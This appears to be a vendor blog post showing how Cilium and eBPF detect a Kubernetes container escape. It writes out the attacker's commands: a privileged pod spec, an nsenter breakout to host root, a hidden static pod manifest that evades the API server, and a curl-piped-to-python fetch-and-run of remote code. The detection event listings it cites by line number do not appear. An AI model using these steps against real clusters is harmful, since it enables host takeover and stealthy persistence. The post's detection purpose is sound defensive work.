Detecting a Container Escape with Cilium and eBPF
If you run Cloud Native Workloads, you better secure them. After all, services are often exposed to the public and Workloads might belong to various tenants. In this blog post we will show you how an attacker with access to your Kubernetes cluster could do a container escape: running a pod to gain root privileges, escaping the pod onto the host, and persisting the attack with invisible pods and fileless executions. And we will show you how to detect these attacks with Isovalent Cilium Enterprise.
During a container escape an attacker breaks the isolation boundary between the host and the container, ending up escaping into what is eventually a Kubernetes control plane or a worker node. In this case, the attackers can see other containers that are running on the same host, gather their secrets, read or write data on the host file system, attack kubelet and escalate privileges; or exploit a Kubernetes bug and persist in the environment by deploying an invisible pod.
Applying security best practises on a Kubernetes environment can limit these types of attacks but a container breakout is still possible, an attacker can use a privileged pod or exploit an existing vulnerability to gain privileges. Security Teams need to measure if hardening configurations are suitable and applied protections are working.
One way to achieve this is observability following a data-driven approach: collect data from Kubernetes workloads and hosts, observe feedback, and make continuous data-driven decisions to protect the Kubernetes environment.
By using eBPF, Security Teams can get unique visibility directly into any Kubernetes workloads, such as pods. Because pods on a Kubernetes node share a single kernel, each of the processes within a pod are visible to a single eBPF program. This can provide full visibility into each process running on a node whether they are long running processes on the host managed by systemd or short lived processes running inside of containers.
Cilium uses eBPF to very efficiently monitor all network and process behaviour inside of Kubernetes workloads and outside on the host and gives you Kubernetes Identity Aware and OS Level Process Visibility into those behaviours.
Cilium deploys as a daemonset inside of a Kubernetes environment. So, there is a Cilium agent running on each Kubernetes node and it is communicating with the Kubernetes API server to understand Kubernetes Pod Identities, Network Policies, Services etc. Then based on the identity of each one of the workloads deployed inside of a Kubernetes environment, Cilium installs a highly efficient eBPF program to do Connectivity, Observability and Security for those workloads.
Rich Security Events
Cilium is both able to observe and enforce what behaviour happened inside of a Linux system. It can collect and filter out Security Observability data directly in the kernel and export it to user space as JSON events and / or store them in a specific log file via a Daemonset called hubble-enterprise. These JSON events are enriched with Kubernetes Identity Aware Information including services, labels, namespaces, pods and containers and with OS Level Process Visibility data including process binaries, pids, uids, parent binaries with the full Process Ancestry Tree. These events can then be exported in a variety of formats and sent to external systems such as a SIEM, e.g: Elasticsearch, Splunk or stored in an S3 bucket. For simplicity, in this blog post they will be directly consumed from the log file.
By leveraging this real-time time Network and Process-Level Visibility Data from the kernel via Cilium, Security Teams are able to see all the processes that have been executed in their Kubernetes environment which helps them to make continuous data driven decisions and improve the security posture of their system. One such example is detecting a container escape.
Let’s reach the host namespace
In this example, we are using a privileged pod with host namespace configuration to represent a container escape attack. This is possible in a hardened Kubernetes environment, as we demonstrate it here. Note, that there are multiple ways to perform a breakout, for example an attacker can exploit a vulnerability as well to gain privileges and escape out of the container sandbox.
The first and easiest step for an attacker to perform a container escape would be to spin up a pod with a privileged Pod spec. Note: Kubernetes allows this by default and the privileged flag grants the container all available kernel capabilities. The hostPID and hostNetwork flag places the container into the host PID and networking namespace, so it can see and interact with all process and network resources. One easy example can be found in the following yaml file:
$ cat privileged.yaml apiVersion: v1 kind: Pod metadata: name: privileged-the-pod spec: hostPID: true hostNetwork: true containers: - name: privileged-the-pod image: nginx:latest ports: - containerPort: 80 securityContext: privileged: true
So, let’s apply that privileged Pod spec:
$ kubectl apply -f privileged.yaml pod/privileged-the-pod created $ kubectl get pods NAME READY STATUS RESTARTS AGE privileged-the-pod 1/1 Running 0 11s
Now, the attacker has a privileged pod up and running which gives them the same permissions as they would have if they were root on the underlying node. Why is it so powerful? Because of the capabilities that the pod has started with, including CAP_SYS_ADMIN, which is essentially the “new root” in Linux and also gives access to all devices on the host machine. This capability in combination with HostPID gives the attacker access to breaking out of all container namespaces put in place, so they can interact with and exploit any other process or filesystem on the underlying node where the privileged pod is deployed.
By using Cilium, Security Teams can detect any privileged container execution by picking up the following process_exec event exported to userspace by executing the following command:
kubectl logs -n kube-system ds/hubble-enterprise -c export-stdout
Secondly, they can see the related:
- Kubernetes Identity Aware Information, such as the namespace:
default, the pod name:
privileged-the-pod, the container-id and the label
- OS Level Visibility Information, such as the binary:
0and the arguments:
nginx -g \"daemon off;
- Full Process Ancestry Tree which includes
/usr/bin/containerd-shimas a direct parent process binary
- Capabilities that the container has started which includes
As a second step, the attacker can use kubectl exec to get shell access to
kubectl exec -it privileged-the-pod -- /bin/bash root@minikube:/#
A shell suddenly popping up in a container log after it was started is of course an event the Security Team is interested in. They can detect the bash execution by picking up the following process_exec event exported to userspace via Cilium. The Process Information can be seen between line 4 and 11 while the Kubernetes Identity Aware Information can be seen between line 12 and 24.
As a third step, the attacker can use the nsenter command to enter into the host namespace and run the bash command as root on the host.
root@minikube:/# nsenter -t 1 -a bash bash-5.0#
nsenter command executes commands in specified namespaces. The first flag,
-t defines the target namespace where the attacker wants to go. Every Linux machine runs a process with PID
1 which always runs in the host namespace. The other command line arguments define the other namespaces where the attacker also wants to enter, in this case,
-a describes all the namespaces.
So, the attacker is breaking out from the container in every possible way and running the
bash command as
root on the host.
Security Teams can identify this breakout by picking up two process_exec events. In the first event, they are able to observe the executed
nsenter command in line 8 with the appropriate namespace arguments
-t 1 -a in line 9. They can also see the source pod name in line 15, which is
privileged-the-pod and all the Kubernetes Identity Aware and OS Level Visibility Information:
By picking up the second process_exec event, Security Teams are able to detect the bash execution on the host namespace having
nsenter as a parent process binary. The Parent Process Information can be seen between line 151 and 177 and the source binary name can be seen in line 8, which is
Now, the attacker has reached the host namespace on a node in a Kubernetes cluster and is running bash. We have used a privileged container with hostPID associations in this example. In the real world, this could also have been an unprivileged container with its own process namespace that then managed to exploit a kernel vulnerability to gain privileges and break out. What can they do? The attacker can see containers that are running on the same controller node, gather secrets associated with them, read data from the host file system, attack kubelet and escalate privileges; or exploit a special Kubernetes behavior and persist the breakout by firing up an invisible container. Let’s assume the attacker chooses the last option.
Container where are you?
Persist the break out by creating an invisible container by the Kubernetes API server
Apart from stealing sensitive information from other Kubernetes workloads, peaking into other Kubernetes namespaces, the attacker can persist the breakout by starting a “hidden”, static pod.
There are many ways an attacker could create a persistent process to hide traces of further activities. For this example, we are going to use a static Kubernetes pod. Unfortunately, many Security Teams make the assumption that every time
kubelet launches a workload all the configs have been statically analyzed by the Kubernetes API server and its webhooks. They don’t take into account that if an attacker inserts a Pod spec under the
/etc/kubernetes/manifests directory on a
kubeadm managed cluster,
kubelet will automatically launch the pod without notifying the Kubernetes API server about it.
To persist the breakout, the attacker can go to the
/etc/kubernetes/manifests directory on the controller node, since they have access to all the resources and take a look at what is there:
bash-5.0# cd /etc/kubernetes/manifests/ bash-5.0# ls -l total 20 -rw------- 1 root root 2289 Oct 13 12:40 etcd.yaml -rw------- 1 root root 3595 Oct 13 12:40 kube-apiserver.yaml -rw------- 1 root root 2895 Oct 13 12:40 kube-controller-manager.yaml -rw------- 1 root root 1385 Oct 13 12:40 kube-scheduler.yaml
As a next step, the attacker can insert a Pod spec named
hack-latest.yaml with a namespace that doesn’t exist (namespace:
doesnt-exist). This way the pod will be picked up by
kubelet by default and will be still invisible for the Kubernetes API server.
bash-5.0# cat << EOF > hack-latest.yaml > apiVersion: v1 > kind: Pod > metadata: > name: hack-latest > hostNetwork: true > # define in namespace that doesn't exist so > # workload is invisible to the API server > namespace: doesnt-exist > spec: > containers: > - name: hack-latest > image: sublimino/hack:latest > command: ["/bin/sh"] > args: ["-c", "while true; do sleep 10;done"] > securityContext: > privileged: true > # Define the control plane node the privileged pod > # will be scheduled to > nodeName: kind-control-plane > EOF
As a validation, the attacker can firstly run
crictl ps and see that the container is running on the controller node. The following bash snippet shows that the
hack-latest container is up and running with the following docker id
bash-5.0# crictl ps CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID cc7f47efbbfee sublimino/hack@sha256:569f3fd3a626a4cfd50e4556425216a5b8ab3d8bf9476c1b1c615b83ffe4000a About a minute ago Running hack-latest 0 895972101d32b e083d7868b7ff cilium/json-mock@sha256:d8797011275f12c0a22d308227364493954c9e07e21c96c7caf6cf50b892d638 19 minutes ago Running frontend-service 0 31260e2cd0dc8 a025e4319f354 cilium/json-mock@sha256:d8797011275f12c0a22d308227364493954c9e07e21c96c7caf6cf50b892d638 19 minutes ago Running backend-service 0 a455f019f215b ...
Secondly, the attacker can run
kubectl get pods --all-namespaces outside from the controller node, which shows that the
hack-latest container is completely invisible for the Kubernetes API server in the following bash snippet:
$ kubectl get pods --all-namespaces NAMESPACE NAME READY STATUS RESTARTS AGE default privileged-the-pod 1/1 Running 0 51m kube-system cilium-n8wtg 1/1 Running 0 75m kube-system cilium-operator-65fcccb665-7vwjh 0/1 Pending 0 75m kube-system cilium-operator-65fcccb665-bbfph 1/1 Running 0 75m kube-system coredns-558bd4d5db-hvvph 1/1 Running 0 75m kube-system etcd-minikube 1/1 Running 0 76m kube-system hubble-enterprise-jrl56 2/2 Running 0 55m kube-system hubble-relay-8676fb6fdc-r4285 1/1 Running 0 75m kube-system hubble-ui-7f6d94945b-mtffv 3/3 Running 0 75m kube-system kube-apiserver-minikube 1/1 Running 0 76m kube-system kube-controller-manager-minikube 1/1 Running 0 76m kube-system kube-proxy-m958t 1/1 Running 0 76m kube-system kube-scheduler-minikube 1/1 Running 0 76m kube-system storage-provisioner 1/1 Running 1 76m
With Cilium Security Teams can follow the attacker’s move until creating the invisible container by picking up the following exporter process_exec events.
The first event shows the
hack-latest.yaml Pod spec insertion under the
/etc/kubernetes/manifests/ directory. The source binary can be seen in line 8 while the current working directory is shown in line 7.
By detecting the second process_exec event, Security Teams are able to pick up the invisible
hack-latest container execution having the source binary in line 8 and the arguments in line 9.
Execute a malicious python script in memory
Now that the attacker has actually persisted the breakout by spinning up an invisible container, they can download and execute a malicious script in memory that never touches disk. Note that this simple python script can be a fileless malware which is almost impossible to detect by using traditional userspace tools.
As a first step, the attacker can
docker exec into the invisible container
bash-5.0# docker exec -it cc7f47efbbfee /bin/bash PRETTY_NAME="Alpine Linux v3.12" root@minikube:~
Then they download a malicious python script and execute it in memory:
root@minikube:~ # curl https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py | python % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 488 100 488 0 0 1574 0 --:--:-- --:--:-- --:--:-- 1574
With Cilium Security Teams are able to follow the attacker’s movement by using the power of the kernel and gain real-time visibility into the memory of the processes, network connections and observe system access.
They can pick up the following process_exec events. With the first event, they are able to see the bash execution in a container with a docker id of
cc7f47efbbfee, which is the invisible
hack-latest container. The docker id can be seen in line 12, meanwhile the source binary can be seen in line 8.
In the second process_exec event Security Teams are able to observe the sensitive
curl command in line 8 with the following arguments
https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py in line 9:
With the third process_connect event, Security Teams are also be able to pick up the sensitive socket connection opened via
curl with the following arguments
https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py and with the following destination IP
22.214.171.124 and port
443. The Source and Destination Address Information can be found between line 29 and 32, meanwhile the Process Information can be found between line 4 and 14.
Lastly, with the fourth process_exec event, Security Teams are able to pick up the malicious python script execution in memory. The
cc7f47efbbfee2ff38382d32 docker id of the container can be seen in line 12 while the
/usr/bin/python source binary can be seen in line 8:
Securing a Kubernetes environment can be challenging. Measuring the current state of the security posture in your Kubernetes environment requires Observability. Security Teams need to start collecting the right data to be able to detect a sophisticated attack, like a container escape that occurs within a Kubernetes environment.
The container escape attack that was covered in this blog post included simple but effective steps proving that Security Teams need Observability and the ability to Measure the data to be able to detect those steps.
By leveraging the Observability of Isovalent Cilium Enterprise, they can detect behaviours that are outside of the security posture of their environment.
This becomes possible by the superpower of eBPF and Cilium.
If you want to learn more about Isovalent Cilium Enterprise, the open source project Cilium or the underlying technology eBPF, join us for an “Ask Me Anything” with one of our technical experts:
Also make sure to check out:
- Feature set of Isovalent Cilium Enterprise
- User Stories and Deep Dives for Isovalent Cilium Enterprise
- Cilium Open Source Project
- eBPF Community Resources
Isovalent is the company founded by the creators of Cilium and eBPF. Isovalent builds open-source software and enterprise solutions solving networking, security, and observability needs for modern cloud native infrastructure. The flagship technology Cilium is the choice of leading global organizations including Adobe, AWS, Capital One, Datadog, GitLab, Google, and many more. Isovalent is headquartered in Mountain View, CA and is backed by Andreessen Horowitz, Google and Cisco Investments. To learn more, visit isovalent.com or follow @isovalent.